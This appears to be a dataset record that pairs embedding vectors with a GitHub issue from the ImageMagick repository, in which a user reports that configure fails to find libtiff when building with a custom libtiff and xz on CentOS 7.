-0.013874005526304245, -0.0009242119267582893, 0.006255900952965021, -0.02798423171043396, -0.004279524553567171, 0.023055100813508034, 0.006161412689834833, -0.001913384418003261, -0.014889752492308617, 0.010685031302273273, 0.002014762256294489, 0.004275587387382984, 0.00448818551376462, 0.024173211306333542, -0.011007865890860558, -0.019385812804102898, 0.023653525859117508, -0.004519681911915541, 0.01253542397171259, -0.007224404253065586, 0.010125976987183094, 0.02300785668194294, 0.018866127356886864, 0.0006264758994802833, -0.015055106952786446, -0.008314954116940498, 0.00932282768189907, 0.029196828603744507, 0.01070865336805582, 0.012196841649711132, 0.010102354921400547, -0.024393683299422264, 0.031023599207401276, 0.01888187602162361, -0.01834644377231598, -0.002318895887583494, -0.022409431636333466, -0.0006461609154939651, 0.008708654902875423, 0.009425190277397633, 0.00044906462426297367, 0.0010954716708511114, -0.0014232272515073419, -0.002596454694867134, -0.003879918484017253, -0.006468499079346657, -0.0011643691686913371, -0.012488179840147495, -0.028031475841999054, 0.012897628359496593, -0.011566920205950737, 0.01896061562001705, -0.010606291703879833, 0.002901572734117508, 0.001484250882640481, 0.021291323006153107, -0.04302358999848366, 0.029275568202137947, 0.0029704703483730555, -0.03420469909906387, -0.007366136182099581, -0.014015737920999527, 0.0010423220228403807, 0.010448811575770378, 0.0032992102205753326, -0.000823326176032424, 0.019165340811014175, -0.015582665801048279, 0.008881882764399052, -0.014141721650958061, -0.01533857174217701, 0.005988184362649918, 0.009165347553789616, -0.013330698944628239, 0.011866132728755474, 0.009551174007356167, 0.026188956573605537, -0.025417303666472435, -0.006354325916618109, -0.015629909932613373, 0.01229132991284132, 0.01249605417251587, 0.009582670405507088, -0.01447243057191372, 0.015220461413264275, 0.0031870054081082344, 0.0026377933099865913, -0.001293306122533977, 0.0012194872833788395, 0.00928345788270235, 0.019007859751582146, -0.007976371794939041, 0.0037539342883974314, 0.01984250545501709, 0.000854330079164356, -0.015826759859919548, 0.021370062604546547, 0.014874004758894444, -0.006748026702553034, -0.015275578945875168, -0.03148028999567032, -0.011629913002252579, 0.0037066901568323374, -0.011881881393492222, -0.005267712753266096, -0.008566922508180141, -0.00035137770464643836, -0.0018110222881659865, -0.013897627592086792, -0.011070857755839825, 0.01149605493992567, 0.004421256482601166, 0.015291327610611916, -0.024566911160945892, 0.0018031483050435781, 0.014480303972959518, 0.018535420298576355, -0.035307060927152634, -0.003604328026995063, -0.02491336688399315, -0.006657475605607033, 0.013377943076193333, 0.004807082936167717, 0.006291334051638842, -0.01677164062857628, 0.00725590018555522, -0.012377943843603134, -0.004822831135243177, -0.004893697332590818, 0.004236217122524977, -0.0077165295369923115, -0.015401563607156277, 0.010440937243402004, -0.014118099585175514, -0.011417314410209656, 0.02196848765015602, -0.005346452817320824, -0.017574790865182877, -0.02214171551167965, 0.0007386805373243988, -0.0012391722993925214, -0.018377939239144325, -0.031259819865226746, 0.005633854307234287, -0.008464560844004154, -0.00783070269972086, 0.005547239910811186, -0.018598411232233047, 0.006531491409987211, -0.003964563831686974, 0.005015744362026453, 0.004460626747459173, -0.008874009363353252, 0.009826764464378357, 0.013244085013866425, 0.01102361362427473, 0.00924408808350563, -0.008511804975569248, -0.010212590917944908, 0.0001329969527432695, -0.022740140557289124, -0.008011804893612862, -0.02330707013607025, 0.011275582015514374, 0.0016683058347553015, -0.00983463879674673, 0.000518208253197372, 0.002683068858459592, 0.0010108259739354253, 0.020188961178064346, 0.007669285871088505, -0.012543297372758389, -0.0022637778893113136, 0.0021023605950176716, -0.004240154288709164, 0.0028818876016885042, -0.016661405563354492, 0.0026988168247044086, -0.01850392296910286, 0.004594484809786081, -0.011488180607557297, 0.00003847807238344103, 0.008393694646656513, 0.0029271631501615047, -0.037889737635850906, -0.027417302131652832, -0.025590531527996063, -0.0013336604461073875, -0.0016309042694047093, 0.016881877556443214, -0.019590536132454872, -0.00674015237018466, 0.0158110111951828, -0.01754329353570938, 0.011204715818166733, 0.0004869583062827587, 0.009905504062771797, 0.008881882764399052, -0.018629906699061394, -0.002877950668334961, 0.026818877086043358, 0.01011810265481472, 0.010740149766206741, 0.001599408220499754, 0.0010206685401499271, -0.007047238759696484, -0.0034212572500109673, 0.007444876246154308, -0.00723621528595686, 0.0030944859609007835, -0.009700779803097248, -0.017527546733617783, 0.0018602348864078522, -0.010661409236490726, -0.01407085545361042, 0.006421254947781563, -0.015944870188832283, -0.014850382693111897, -0.005893696565181017, -0.008125978522002697, 0.005255901720374823, 0.012417313642799854, 0.0008366135298274457, 0.0023110220208764076, -0.017999986186623573, 0.0067283413372933865, -0.0032244070898741484, -0.012047234922647476, 0.013070856221020222, 0.007692907936871052, 0.003273619571700692, -0.00783070269972086, -0.010692905634641647, 0.0032854306045919657, -0.002653541276231408, 0.008267709985375404, 0.016551168635487556, -0.001374998944811523, -0.0069173178635537624, -0.02277163602411747, 0.010236212983727455, 0.020157465711236, 0.007181097287684679, 0.005555113777518272, -0.03760627284646034, -0.00017741128976922482, 0.019795261323451996, -0.020062977448105812, 0.015047232620418072, -0.021385811269283295, -0.005346452817320824, 0.02481887862086296, -0.022078724578022957, -0.021291323006153107, 0.0014409438008442521, 0.006657475605607033, -0.0024350376334041357, -0.009929126128554344, 0.01952754519879818, -0.0069330655969679356, 0.00897637102752924, -0.012692904099822044, 0.001231298316270113, -0.008503930643200874, 0.006929128896445036, -0.025700768455863, 0.004972437396645546, 0.02601572871208191, -0.011574794538319111, -0.005153539590537548, 0.01478739082813263, -0.013574793003499508, 0.02244092896580696, -0.011708652600646019, -0.005755901336669922, -0.00870078057050705, 0.00814172625541687, -0.0005748027469962835, 0.011275582015514374, -0.0049370042979717255, -0.015582665801048279, 0.016629908233880997, -0.016488177701830864, 0.013023612089455128, -0.001045274781063199, 0.009228339418768883, 0.0024114155676215887, -0.000016932197468122467, 0.016850382089614868, -0.000165846329764463, -0.014952745288610458, 0.02475588768720627, 0.0015324791893363, 0.00537401158362627, -0.014834634959697723, -0.0003156985912937671, -0.0017234239494428039, 0.0059251924976706505, -0.0060196807608008385, -0.008755899034440517, -0.0016249987529590726, 0.011165346018970013, 0.005255901720374823, 0.0028661396354436874, 0.00010685277811717242, -0.02039368636906147, 0.0006259838119149208, -0.008275584317743778, -0.0078070806339383125, 0.0007839560857973993, 0.0005437987856566906, 0.015795264393091202, 0.020803134888410568, -0.008480308577418327, -0.018062978982925415, -0.0032657457049936056, 0.03066139481961727, -0.009133851155638695, -0.003293304704129696, -0.014496052637696266, 0.00644487701356411, -0.00418897345662117, -0.014086604118347168, -0.006653538439422846, 0.009661410003900528, 0.003222438506782055, 0.011881881393492222, -0.027338562533259392, 0.006275585852563381, 0.014448808506131172, -0.017606286332011223, 0.00019094474555458874, -0.01545668113976717, -0.010125976987183094, -0.00007252701470861211, -0.01976376585662365, -0.009850386530160904, 0.025118092074990273, -0.013015738688409328, -0.017889751121401787, 0.0023267699871212244, 0.019496047869324684, 0.003842516802251339, 0.005523617845028639, -0.03612595796585083, 0.005106295458972454, 0.003803146770223975, 0.016409436240792274, -0.010527551174163818, 0.011385818012058735, 0.019811008125543594, 0.016086602583527565, 0.03155903145670891, -0.014488178305327892, 0.00727558508515358, -0.0019517701584845781, 0.019905496388673782, -0.004385823383927345, 0.0021259826608002186, -0.019149592146277428, 0.010826763696968555, 0.013330698944628239, -0.003874012967571616, 0.01919683627784252, 0.003507871413603425, -0.01565353199839592, -0.004602358676493168, -0.002072833012789488, 0.021858250722289085, 0.035307060927152634, -0.006712593603879213, -0.004133854992687702, 0.007925190962851048, 0.01675589382648468, -0.006377947982400656, 0.002988186664879322, 0.0034448793157935143, 0.0028346434701234102, -0.01636219210922718, 0.009393693879246712, 0.002976375864818692, -0.005307082552462816, -0.012149597518146038, 0.00010826763900695369, -0.010314952582120895, -0.008708654902875423, 0.020047228783369064, -0.0011249991366639733, 0.01826770231127739, -0.002791336504742503, 0.0010915346210822463, 0.01493699662387371, 0.0003176670870743692, -0.011527550406754017, 0.003919288516044617, 0.008881882764399052, -0.0021889747586101294, 0.012944872491061687, 0.0035393675789237022, 0.026598405092954636, -0.0059448773972690105, 0.011850384995341301, -0.006527554243803024, 0.00009633359150029719, 0.005452751647680998, 0.005161413457244635, -0.0031476353760808706, 0.01299999002367258, 0.0027460609562695026, 0.03137005493044853, 0.015267705544829369, 0.00029232262750156224, -0.009385819546878338, -0.006814955733716488, -0.005893696565181017, -0.010818889364600182, -0.010244087316095829, -0.0017883845139294863, 0.0019931087736040354, -0.00858267117291689, -0.0018316915957257152, -0.017527546733617783, 0.019779512658715248, 0.008755899034440517, -0.00018061010632663965, 0.01485825702548027, -0.0025373997632414103, 0.004641728941351175, 0.0008587592164985836, 0.019511796534061432, -0.0004074800235684961, 0.01074802316725254, 0.01937006413936615, -0.009629914537072182, -0.0058779483661055565, 0.019732268527150154, 0.02798423171043396, -0.03990548104047775, 0.014370067976415157, -0.025322815403342247, 0.006244089920073748, -0.01426770631223917, 0.0011870069429278374, 0.00762597844004631, -0.004732280038297176, -0.007893694564700127, -0.029291316866874695, -0.0005949798505753279, 0.0069606248289346695, 0.0017844474641606212, -0.0015905500622466207, -0.017748018726706505, 0.021464550867676735, 0.0268818698823452, -0.0079015688970685, 0.025181083008646965, 0.001937990658916533, 0.0005777555052191019, -0.0020413370802998543, -0.004929130431264639, 0.01083463802933693, 0.011275582015514374, -0.019716521725058556, -0.01659841276705265, -0.007637789472937584, 0.02615746110677719, 0.0022893683053553104, 0.014125973917543888, -0.010795267298817635, -0.01438581570982933, -0.02300785668194294, -0.007413380313664675, 0.014078729785978794, 0.012031487189233303, 0.009141725488007069, -0.010881882160902023, 0.004921256098896265, -0.007688970770686865, 0.013574793003499508, 0.01866140402853489, 0.008716529235243797, 0.00870078057050705, 0.024724390357732773, -0.01299999002367258, 0.02822045236825943, 0.021480299532413483, -0.01801573485136032, 0.021070851013064384, 0.013307076878845692, -0.012913376092910767, 0.004496059846132994, -0.0019645653665065765, 0.0034055092837661505, -0.012629912234842777, -0.03423619642853737, 0.0018966521602123976, -0.023259826004505157, -0.021622031927108765, 0.009425190277397633, -0.004017713479697704, -0.02869289182126522, 0.0060433028265833855, 0.020047228783369064, -0.008637788705527782, -0.0012214557500556111, -0.0010004914365708828, -0.01098424382507801, -0.0009094481356441975, 0.02670864202082157, -0.040976349264383316, 0.013905501924455166, -0.008590544573962688, -0.006220467854291201, 0.004775587003678083, -0.014480303972959518, 0.03313383460044861, 0.017291326075792313, 0.03423619642853737, 0.0010757866548374295, -0.004618106875568628, -0.014456681907176971, -0.001350392703898251, -0.005366137716919184, -0.006535428110510111, -0.0017637782730162144, 0.017999986186623573, -0.005295271519571543, 0.010692905634641647, 0.02086612582206726, 0.002070864662528038, 0.018472427502274513, -0.007452750578522682, -0.000030496408726321533, -0.00391338299959898, -0.02259840816259384, 0.014629910700023174, -0.00642519211396575, 0.002545273629948497, 0.00007689462654525414, -0.009645662270486355, 0.020425181835889816, -0.01866140402853489, -0.006594483274966478, 0.009740150533616543, -0.005043303593993187, -0.02253541722893715, 0.0011948810424655676, -0.016023609787225723, 0.004017713479697704, -0.007897632196545601, 0.014251957647502422, 0.009685032069683075, 0.02404722571372986, 0.018440932035446167, -0.029370056465268135, -0.001918305642902851, 0.003860233351588249, -0.00980314239859581, -0.011527550406754017, 0.01351180113852024, 0.010228338651359081, 0.005220468621701002, -0.020251953974366188, 0.0004092024464625865, 0.01984250545501709, -0.004881886299699545, -0.018614159896969795, 0.006066924426704645, 0.0018631876446306705, 0.010086607187986374, -0.03725981339812279, 0.012755895964801311, -0.002452754182741046, -0.01590549945831299, 0.013314951211214066, 0.007118104957044125, 0.010307079181075096, -0.020157465711236, 0.017842506989836693, 0.007838577032089233, 0.006614168174564838, -0.0048188939690589905, -0.015346445143222809, -0.006007869727909565, -0.0026122028939425945, -0.00039763751556165516, -0.009062985889613628, 0.005267712753266096, -0.003045273246243596, 0.01011810265481472, 0.0057637752033770084, 0.0005713578430004418, -0.012519676238298416, 0.003249997505918145, -0.006767711602151394, -0.01257479377090931, 0.005700783338397741, -0.0008400584338232875, 0.004425193648785353, 0.007897632196545601, 0.006606294307857752, -0.008125978522002697, 0.009125977754592896, -0.017748018726706505, 0.015716522932052612, -0.007854324765503407, 0.028661396354436874, -0.027795255184173584, 0.01074802316725254, -0.004952752031385899, -0.019228331744670868, -0.003311021253466606, -0.016976365819573402, -0.00448424881324172, -0.003236218122765422, -0.0134409349411726, -0.01458266656845808, 0.00225196685642004, 0.0016161405947059393, 0.01430707611143589, 0.013385816477239132, 0.025559036061167717, -0.000913877272978425, -0.012748021632432938, -0.013874005526304245, -0.0040866113267838955, -0.0031515725422650576, -0.00834645051509142, -0.009999992325901985, 0.002267714822664857, 0.0069803097285330296, -0.0005959641421213746, -0.013456682674586773, -0.017968490719795227, -0.015921248123049736, -0.008637788705527782, -0.002452754182741046, -0.03785824030637741, -0.0010944873793050647, 0.011834637261927128, 0.008007868193089962, -0.005401570815593004, 0.013921249657869339, 0.008850387297570705, -0.02648817002773285, -0.0019458647584542632, -0.013858257792890072, 0.00873227696865797, -0.016425184905529022, -0.009275583550333977, -0.012582668103277683, 0.012007865123450756, -0.021606283262372017, 0.004992122296243906, -0.0016151563031598926, -0.0019192899344488978, 0.022236203774809837, 0.011007865890860558, 0.0024803131818771362, -0.00729133328422904, 0.008748024702072144, -0.012826762162148952, 0.008433064445853233, -0.02259840816259384, 0.021637778729200363, 0.0069094435311853886, 0.023685021325945854, -0.004610233008861542, 0.011055110022425652, 0.003685036674141884, 0.029685016721487045, -0.003484249347820878, 0.016094475984573364, -0.0036870052572339773, -0.0008681095787324011, -0.014992115087807178, 0.005822830367833376, -0.003289367537945509, 0.021464550867676735, 0.01919683627784252, 0.011724400334060192, -0.007448813412338495, 0.006724404636770487, 0.003246060572564602, -0.0034665327984839678, -0.007417317479848862, -0.012102353386580944, 0.010999991558492184, -0.00956692174077034, 0.02088187448680401, -0.006421254947781563, -0.010299204848706722, -0.013409438543021679, -0.012251959182322025, 0.010716527700424194, 0.0069173178635537624, -0.0010226370068266988, 0.002757871989160776, -0.0017047231085598469, 0.014401564374566078, 0.034425172954797745, 0.02111809514462948, 0.002663383958861232, -0.016944868490099907, 0.025700768455863, 0.010574795305728912, -0.0049133822321891785, -0.012566919438540936, -0.0033641706686466932, 0.014354320243000984, 0.010314952582120895, -0.012858258560299873, 0.014496052637696266, 0.00674015237018466, -0.024094469845294952, -0.00587007449939847, -0.012992116622626781, -0.004618106875568628, 0.018062978982925415, 0.008779521100223064, 0.00450393371284008, 0.013188966549932957, -0.016944868490099907, -0.013354321010410786, -0.009653536602854729, 0.01811022311449051, 0.023196833208203316, 0.016866128891706467, 0.025086594745516777, 0.0016043295618146658, 0.013826761394739151, 0.009629914537072182, 0.011716526933014393, -0.01118896808475256, 0.008999993093311787, 0.01083463802933693, 0.017417309805750847, -0.0006638774648308754, 0.01771652325987816, -0.002952753799036145, -0.0057165310718119144, -0.011448810808360577, -0.004370075650513172, 0.014401564374566078, 0.02244092896580696, 0.006051176693290472, -0.021858250722289085, -0.006011806428432465, 0.01842518337070942, 0.006393696181476116, 0.001747045898810029, 0.016314947977662086, -0.029779504984617233, -0.002299210987985134, 0.015866130590438843, 0.0482204370200634, 0.009409441612660885, -0.02007872611284256, -0.0174015611410141, 0.020771637558937073, -0.024551162496209145, -0.022708645090460777, 0.031338561326265335, 0.0005585625767707825, 0.015267705544829369, -0.016393689438700676, -0.005696846172213554, 0.01968502439558506, -0.0011929124593734741, 0.0029094466008245945, -0.0038582647684961557, 0.019385812804102898, 0.011913376860320568, 0.00670078257098794, 0.011929124593734741, -0.013055108487606049, -0.01094487402588129, 0.0010374007979407907, 0.003779524704441428, -0.007881883531808853, -0.0004739169671665877, 0.0268818698823452, -0.03518107533454895, -0.016724396497011185, 0.0181732140481472, -0.0005260822945274413, 0.004590547643601894, -0.005114169325679541, -0.0004901571082882583, -0.018929120153188705, -0.006094483658671379, -0.02110234647989273, -0.010511803440749645, 0.011921251192688942, 0.02656690962612629, -0.018204711377620697, -0.004535429645329714, -0.002143699210137129, 0.006283459719270468, -0.0014478336088359356, -0.015283453278243542, 0.006291334051638842, -0.01653541997075081, -0.024251950904726982, -0.004318894352763891, -0.0060433028265833855, 0.012141723185777664, -0.00529920868575573, 0.011070857755839825, 0.005102358292788267, 0.01722833327949047, 0.0037401546724140644, -0.007232278119772673, 0.00794093869626522, -0.0009197827894240618, 0.006649601273238659, -0.009220466017723083, -0.003259840188547969, 0.029464544728398323, 0.00834645051509142, 0.014409437775611877, -0.007346451282501221, -0.00838582031428814, -0.000944881176110357, 0.006858262699097395, 0.021007858216762543, -0.0007524600951001048, 0.018614159896969795, 0.0037716508377343416, -0.006590546108782291, 0.021716520190238953, 0.0002883856068365276, -0.009874008595943451, -0.007019679993391037, -0.0015098414150997996, 0.020850379019975662, -0.012708651833236217, 0.008511804975569248, 0.008818890899419785, -0.005661413073539734, -0.0027755885384976864, -0.005523617845028639, -0.00030585608328692615, -0.011622038669884205, 0.007618104573339224, -0.0024763760156929493, -0.014370067976415157, -0.015952743589878082, 0.003919288516044617, 0.028330687433481216, -0.003897635033354163, -0.007496057543903589, 0.018047230318188667, 0.02363777719438076, -0.014874004758894444, 0.009606292471289635, 0.0067952703684568405, 0.012559046037495136, 0.0185826625674963, 0.006515743210911751, 0.019936993718147278, 0.001569880754686892, 0.012763770297169685, 0.025748012587428093, -0.003283462254330516, -0.005177161656320095, -0.0019271639175713062, -0.005476373713463545, 0.010425189509987831, -0.0071220421232283115, -0.005803145468235016, -0.013433060608804226, -0.019590536132454872, -0.010716527700424194, -0.0011870069429278374, 0.02064565382897854, 0.02182675525546074, 0.0094881821423769, 0.0001827016385504976, -0.012874006293714046, 0.003875981317833066, -0.011393692344427109, 0.010055110789835453, -0.019511796534061432, 0.014204713515937328, -0.001846455386839807, -0.003783461870625615, 0.0012854321394115686, 0.002740155439823866, 0.0521574430167675, -0.0010004914365708828, 0.01588975265622139, 0.00448818551376462, 0.0018346443539485335, -0.00037007845821790397, -0.014574792236089706, -0.00477952416986227, -0.01850392296910286, 0.0008243104093708098, -0.0022972424048930407, 0.012787392362952232, -0.00393306789919734, -0.005161413457244635, 0.0021988172084093094, -0.009330702014267445, -0.006767711602151394, -0.018866127356886864, 0.0034547217655926943, -0.0024685021489858627, 0.0010295268148183823, -0.0027952734380960464, 0.003196848090738058, 0.0005501964478753507, 0.0032618085388094187, 0.012566919438540936, 0.011251959949731827, -0.0006579719483852386, -0.00042125952313654125, -0.020771637558937073, 0.02522832714021206, 0.012173219583928585, 0.008299206383526325, 0.011267708614468575, 0.020929118618369102, 0.008125978522002697, -0.015858255326747894, 0.015771642327308655, -0.01177951879799366, -0.013582667335867882, 0.011165346018970013, 0.007917316630482674, -0.01636219210922718, 0.015039359219372272, -0.004893697332590818, 0.0012372038327157497, 0.008259836584329605, -0.03754327818751335, 0.02670864202082157, 0.016173215582966805, 0.0070551130920648575, 0.01825195550918579, -0.008834639564156532, -0.015047232620418072, 0.0033523596357554197, -0.02307084947824478, -0.004629917908459902, -0.010299204848706722, -0.029779504984617233, 0.0020688960794359446, -0.014559044502675533, -0.024062974378466606, -0.009677158668637276, -0.008559049107134342, -0.02094486728310585, -0.0037145642563700676, -0.0010708653135225177, 0.013606289401650429, -0.024535415694117546, 0.013606289401650429, 0.0009990150574594736, -0.01826770231127739, -0.007964560762047768, -0.01937006413936615, 0.009771646000444889, 0.006732278503477573, 0.021527543663978577, 0.002033462980762124, 0.0015275579644367099, -0.010795267298817635, -0.001179132959805429, -0.009401568211615086, 0.0015295264311134815, -0.010566920973360538, -0.007059049792587757, -0.005818893201649189, 0.007492120377719402, -0.008503930643200874, -0.016409436240792274, 0.014228335581719875, -0.01881888322532177, 0.011472432874143124, -0.014905501157045364, -0.0037913357373327017, -0.01459053996950388, -0.012692904099822044, 0.003307084087282419, 0.010062985122203827, 0.002003935631364584, 0.001317912363447249, -0.021165339276194572, -0.004858264233916998, -0.01968502439558506, -0.010511803440749645, -0.0022125968243926764, -0.019874000921845436, -0.01850392296910286, -0.023291321471333504, -0.021307071670889854, -0.0017480301903560758, -0.0037814932875335217, 0.0014291327679529786, -0.0005620074807666242, -0.0033877927344292402, 0.002783462405204773, 0.0017805105308070779, -0.004846453201025724, 0.01095274742692709, 0.009921252727508545, 0.018377939239144325, -0.012527549639344215, -0.0023877935018390417, 0.015094476751983166, 0.0034960603807121515, -0.004295272286981344, -0.006177160888910294, 0.011070857755839825, 0.020755890756845474, -0.005137791391462088, 0.0035629894118756056, -0.0015285421395674348, -0.0068897586315870285, 0.00904723722487688, 0.01181101519614458, -0.009732276201248169, 0.022677147760987282, -0.007618104573339224, -0.008763773366808891, 0.01872439496219158, 0.009590543806552887, -0.012377943843603134, 0.047716498374938965, -0.0050078704953193665, -0.00015317409997805953, -0.011196842417120934, -0.006173223722726107, -0.016102351248264313, -0.012275581248104572, 0.0014143689768388867, -0.012425187975168228, 0.017212586477398872, 0.0012342510744929314, 0.02062990516424179, 0.01692912168800831, 0.0006963577470742166, 0.006862199865281582, -0.0009970464743673801, 0.044629886746406555, -0.015535421669483185, 0.00837794691324234, -0.002994092181324959, 0.009338575415313244, -0.018236206844449043, 0.027165334671735764, 0.004988185130059719, -0.00363582419231534, 0.006236216053366661, 0.00044709612848237157, 0.016188964247703552, -0.0067204674705863, 0.0001476376928621903, 0.014559044502675533, 0.0025511791463941336, -0.0090866070240736, 0.005086610559374094, 0.016488177701830864, 0.0017627939814701676, 0.022094471380114555, 0.003799209836870432, 0.018047230318188667, 0.0009040347649715841, -0.005559050943702459, -0.02119683474302292, 0.0011427156860008836, 0.01083463802933693, -0.004826768301427364, -0.0152125870808959, -0.004389760550111532, 0.005708657205104828, 0.015535421669483185, 0.007086609024554491, -0.007133853156119585, 0.002748029539361596, 0.004389760550111532, -0.027968483045697212, 0.0031535408925265074, 0.0020108253229409456, 0.006590546108782291, 0.011165346018970013, -0.01628345251083374, -0.002600391861051321, -0.010519676841795444, -0.007318892050534487, 0.02009447291493416 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1.-32 ### Operating system Linux ### Operating system, version and so on centos7 ### Description Hello, when compiling ImageMagick with own libtiff and xz library in a custom path, during the configuration lifbtiff is not found. Installing xz-devel from repository fixes that. ### Steps to Reproduce Build with own libtiff and xz library ### Images _No response_
libtiff not found
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7315/comments
0
2024-05-15T05:47:36
2024-05-15T09:47:15Z
https://github.com/ImageMagick/ImageMagick/issues/7315
2,296,920,454
7,315
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : libtiff not found Issue date: --- start body --- ### ImageMagick version 7.1.1.-32 ### Operating system Linux ### Operating system, version and so on centos7 ### Description Hello, when compiling ImageMagick with own libtiff and xz library in a custom path, during the configuration lifbtiff is not found. Installing xz-devel from repository fixes that. ### Steps to Reproduce Build with own libtiff and xz library ### Images _No response_ --- end body ---
559
[ 0.012369129806756973, 0.026003938168287277, -0.0059160878881812096, 0.006609654054045677, 0.03643619641661644, 0.03569468855857849, 0.026234060525894165, 0.047635532915592194, -0.02568432316184044, 0.03559241071343422, -0.02896997146308422, -0.018921252340078354, -0.02728240191936493, 0.014702324755489826, -0.0389675535261631, -0.006705538369715214, 0.003031555563211441, 0.01502194069325924, -0.024584844708442688, -0.03040185011923313, 0.001740307779982686, -0.011646797880530357, 0.01695241965353489, 0.008981202729046345, -0.01011903490871191, -0.009332779794931412, -0.0013008360983803868, 0.0021989564411342144, -0.030376281589269638, -0.023958398029208183, 0.011928060092031956, 0.020608823746442795, -0.0016060691559687257, -0.002713537774980068, 0.03206385299563408, -0.01426764763891697, 0.04129435494542122, 0.06908813863992691, -0.014369924552738667, 0.030018312856554985, -0.0345696397125721, -0.036564040929079056, -0.007025154307484627, 0.00442667817696929, -0.022053487598896027, -0.006711930967867374, 0.010579281486570835, -0.006210134364664555, -0.017348743975162506, 0.007127431221306324, -0.008987595327198505, -0.035720258951187134, -0.025556476786732674, -0.0038737428840249777, -0.011832175776362419, -0.01686292700469494, 0.022219687700271606, 0.028995541855692863, -0.011224905028939247, -0.00039033073699101806, -0.025543691590428352, 0.06995749473571777, 0.03684530407190323, 0.0232552420347929, -0.013001969084143639, 0.0009876126423478127, -0.016338758170604706, 0.011224905028939247, -0.018755052238702774, 0.009064302779734135, -0.006389119196683168, -0.003950450569391251, 0.020365916192531586, 0.011806606315076351, 0.02293562702834606, -0.019765038043260574, 0.025479767471551895, 0.016185341402888298, -0.011576483026146889, -0.0270267091691494, -0.03331674635410309, 0.03592481091618538, -0.029762620106339455, 0.024981167167425156, 0.0234342273324728, 0.01431878563016653, -0.0069228773936629295, -0.059064991772174835, -0.05522960424423218, 0.04055284708738327, 0.0005952843348495662, 0.0014750267146155238, 0.01297000702470541, 0.00835475604981184, 0.01696520484983921, -0.004998790565878153, -0.007542931940406561, -0.02544141374528408, -0.0076068551279604435, -0.017156973481178284, 0.004723920952528715, -0.03628278151154518, -0.00013483790098689497, -0.009511765092611313, -0.010803012177348137, 0.006986800581216812, 0.016006357967853546, -0.0270267091691494, 0.011282436549663544, 0.100384920835495, -0.02771707810461521, -0.017169758677482605, -0.012509760446846485, 0.013577277772128582, -0.019944023340940475, 0.033444594591856, 0.01410144753754139, -0.0031258421950042248, -0.07348605245351791, 0.003761877538636327, 0.003966431599110365, -0.031450189650058746, 0.0005968824261799455, -0.008552917279303074, -0.008789433166384697, 0.02081337757408619, 0.0310666523873806, -0.03620607405900955, -0.00593846058472991, 0.035387855023145676, -0.03208942338824272, -0.006232507061213255, 0.019854530692100525, -0.0024274815805256367, -0.0386095829308033, 0.0050627137534320354, -0.0023012333549559116, 0.0406295545399189, -0.03766351938247681, -0.012567291967570782, -0.012413876131176949, -0.017770636826753616, -0.0252752136439085, 0.017399881035089493, -0.007031546905636787, -0.008361148647964, -0.011442244052886963, -0.05029473453760147, 0.0351065956056118, -0.015980787575244904, -0.0016604039119556546, 0.014344355091452599, 0.00040990719571709633, 0.00860405620187521, 0.04201029613614082, 0.01305949967354536, 0.021695517003536224, 0.03416053205728531, -0.0018841348355636, 0.012797415256500244, -0.009249679744243622, -0.0022005545906722546, 0.02292284183204174, 0.006475415080785751, 0.021439824253320694, -0.009134618565440178, -0.030018312856554985, -0.009569295682013035, -0.02376662753522396, 0.0047143325209617615, 0.014011954888701439, 0.018013544380664825, -0.00910904910415411, -0.023370305076241493, -0.051931168884038925, 0.006942054256796837, -0.004349970258772373, 0.029685910791158676, 0.028279602527618408, -0.039172105491161346, 0.004445855040103197, -0.009236895479261875, 0.004103866405785084, -0.010924466885626316, 0.05098510533571243, 0.00017399083299096674, 0.004644016735255718, -0.016568880528211594, -0.0028270012699067593, 0.0017387097468599677, -0.011231297627091408, 0.003720327513292432, 0.04119207710027695, -0.015379910357296467, 0.04195915535092354, -0.010003972798585892, -0.017425451427698135, -0.012982792221009731, 0.028663141652941704, -0.03352130204439163, 0.007395908702164888, 0.007395908702164888, -0.042444974184036255, -0.026643170043826103, 0.0007938456255942583, 0.035720258951187134, -0.03600151836872101, 0.012190145440399647, 0.006852562073618174, -0.013948031701147556, -0.003018770832568407, 0.019266437739133835, -0.01415258552879095, 0.018870113417506218, 0.0003967230732087046, 0.038584012538194656, 0.012279637157917023, 0.017949620261788368, -0.015469403006136417, 0.014830171130597591, 0.01855049841105938, -0.03592481091618538, 0.017233680933713913, -0.009211326017975807, 0.005420683417469263, -0.015597249381244183, 0.016325972974300385, -0.013072284869849682, -0.012055906467139721, 0.02694999985396862, 0.0636163204908371, -0.032191697508096695, 0.02175944112241268, 0.03231954574584961, 0.002302831504493952, -0.0026320358738303185, -0.0073128086514770985, -0.023319166153669357, -0.04024601727724075, -0.010080681182444096, 0.012273245491087437, 0.03063197433948517, -0.019496561959385872, -0.00894284900277853, 0.00409427797421813, 0.010937251150608063, -0.011812997981905937, 0.03249853104352951, -0.026847723871469498, 0.007811408955603838, -0.017182543873786926, 0.0049700248055160046, 0.03280536085367203, -0.009684357792139053, 0.007587678264826536, 0.021478179842233658, 0.0018042309675365686, -0.009454234503209591, -0.00551976403221488, -0.0562523752450943, 0.05727514252066612, -0.010259665548801422, -0.006424276623874903, 0.020046301186084747, 0.018345944583415985, -0.02091565541923046, 0.004404305014759302, 0.040092602372169495, -0.006846169475466013, -0.0008933260687626898, 0.027410248294472694, -0.0384305976331234, -0.011077881790697575, -0.019176945090293884, -0.0028957186732441187, -0.01272070687264204, -0.018090251833200455, -0.007089077495038509, 0.0463314987719059, 0.007121039088815451, 0.0021701909136027098, 0.03776579722762108, -0.022973980754613876, 0.0004826197982765734, 0.0013663573190569878, 0.0023268028162419796, -0.016926851123571396, -0.022564873099327087, -0.02912338823080063, -0.02333194948732853, -0.009767457842826843, 0.028433017432689667, -0.029251234605908394, 0.003317611524835229, 0.022820565849542618, -0.014497770927846432, 0.0012161380145698786, -0.030606405809521675, -0.025965584442019463, 0.021030716598033905, -0.006411491893231869, 0.01787291280925274, -0.016325972974300385, -0.008840572088956833, -0.009767457842826843, -0.006283645983785391, -0.02174665592610836, 0.029916035011410713, 0.00043228029971942306, -0.04896513372659683, 0.0035125771537423134, 0.007747485768049955, 0.02536470629274845, -0.0007111450540833175, -0.04911854863166809, 0.02409902773797512, 0.015213710255920887, -0.03372585400938988, 0.035132162272930145, -0.014727894216775894, -0.002938866848126054, 0.017860129475593567, -0.023958398029208183, -0.008821395225822926, 0.01112902071326971, -0.007210531271994114, -0.01722089760005474, 0.020506547763943672, -0.023063473403453827, 0.02216854877769947, 0.002526562660932541, 0.002663997234776616, -0.016402680426836014, 